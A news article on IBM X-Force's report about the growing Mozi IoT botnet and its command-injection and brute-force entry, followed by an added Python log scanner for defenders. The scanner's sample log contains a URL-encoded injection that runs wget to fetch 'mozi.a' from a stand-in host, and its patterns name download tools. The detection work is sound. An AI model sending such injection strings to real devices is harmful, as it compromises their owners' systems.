Researchers Find Mozi Botnet Continues to Grow
IBM: P2P Botnet Now Accounts for 90% of IoT Network Traffic
Mozi, a relatively new peer-to-peer botnet, is now dominating global IoT network traffic, according to a new report from IBM's X-Force unit.
The Mozi malware, which has been active since late 2019, accounted for nearly 90% of the global IoT network traffic IBM tracked between October 2019 and June. During this same period, the amount of overall botnet activity increased 400% worldwide, according to the report.
Mozi targets misconfigured IoT devices with command injection attacks that enable it to increase its size, according to IBM X-Force. The botnet targets consumers' IoT devices as well as connected devices used by enterprises.
"The continued growth of IoT usage and poor configuration protocols are the likely culprits behind this jump [in Mozi traffic]. This increase may have been fueled further by corporate networks being accessed remotely more often due to COVID-19," according to the IBM analysis.
Mozi is capable of launching distributed denial-of-service attacks as well as delivering spam and other types of malware. The botnet can also mine for cryptocurrency, say Charles DeBeck and David McMillen, threat intelligence analysts for IBM X-Force.
"The real story is the perseverance and sheer volume of this particular variant," DeBeck and McMillen tell Information Security Media Group. "In the past, we have seen IoT malware variants come and go, but Mozi has a robust footprint, which is persisting to present day."
Mozi Takes Hold
At first, the Mozi malware targeted consumer-grade IoT devices, including home routers and DVRs, to help build its malicious network, according to a report from Black Lotus Labs. In most cases, these connected devices used weak passwords.
IBM reports that, over the last several months, the Mozi botnet has been taking advantage of vulnerabilities in a wider variety of devices, including enterprise-grade routers and devices made by Huawei, Netgear and D-Link as well as closed-circuit cameras.
As with other botnets recently spotted in the wild, Mozi uses peer-to-peer communication protocols to distribute its malware and take control of other device nodes, according to IBM (see: 'FritzFrog' P2P Botnet Targets SSH Servers).
"IoT botnets have focused almost exclusively on consumer devices, but this botnet highlights what IBM has seen as a continued shift toward enterprise targeting, which suggests an increasing threat to organizations using IoT devices," the report states.
Mozi's operators use command injection attacks to help increase the size of the botnet. This works by taking advantage of vulnerabilities in devices to run arbitrary commands.
Mozi also can use brute-force methods from a hardcoded list to bypass weak passwords, according to the report.
As part of the initial attack, the Mozi operators use the shell command "wget" to gain access and permissions. The wget command then retrieves a file called "mozi.a," which is executed on the compromised device's microprocessor. This enables the botnet operators to install other malware, according to the report. The Mozi botnet also can block and bind certain ports, which helps ensure that the malware stays on the device.
Once a device is infected, Mozi uses the encrypted P2P protocol to look for other vulnerable nodes as well as to connect with other IoT devices already compromised with the malware, according to IBM.
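As an added illustration (not part of IBM's report or this article), the following Python checks an IoT device's HTTP access log for the two entry techniques described above: URL-encoded command injection that invokes a download utility such as wget (here fetching a file named mozi.a) and repeated failed logins from a single source, as a password brute-force attempt would produce. The log lines, IP addresses and the /cgi-bin/setup path are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote

# A shell separator followed by a download utility, matched after URL-decoding.
CMD_INJECTION = re.compile(r"(?:;|\|\||\||&&|`|\$\()\s*(?:wget|curl|tftp)\b", re.I)
# The dropper file name reported for Mozi.
MOZI_ARTIFACT = re.compile(r"\bmozi\.a\b", re.I)
# Common Log Format: ip ident user [time] "METHOD path HTTP/x" status size
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" (?P<status>\d{3})')

def scan_access_log(lines, bruteforce_threshold=5):
    """Return a list of (rule_name, source_ip) findings for the given log lines."""
    findings = []
    failed_logins = Counter()
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        ip, status = m["ip"], int(m["status"])
        request = unquote(m["req"])  # decode %3B, %20 etc. before matching
        if CMD_INJECTION.search(request):
            findings.append(("command_injection_download", ip))
        if MOZI_ARTIFACT.search(request):
            findings.append(("mozi_artifact_reference", ip))
        if status == 401:
            failed_logins[ip] += 1  # one rejected credential attempt
    for ip, count in failed_logins.items():
        if count >= bruteforce_threshold:
            findings.append(("password_bruteforce", ip))
    return findings

# Constructed sample log (hypothetical device, RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Sep/2020:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Sep/2020:10:01:05 +0000] '
    '"GET /cgi-bin/setup?host=x%3Bwget%20http%3A%2F%2F203.0.113.5%2Fmozi.a HTTP/1.1" 200 0',
] + [
    f'198.51.100.9 - - [01/Sep/2020:10:02:{i:02d} +0000] "GET /login.cgi HTTP/1.1" 401 0'
    for i in range(6)
]

if __name__ == "__main__":
    for rule, ip in scan_access_log(SAMPLE_LOG):
        print(f"{rule}: {ip}")
```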
The IBM report notes that about 84% of the infrastructure that supports Mozi is located in China.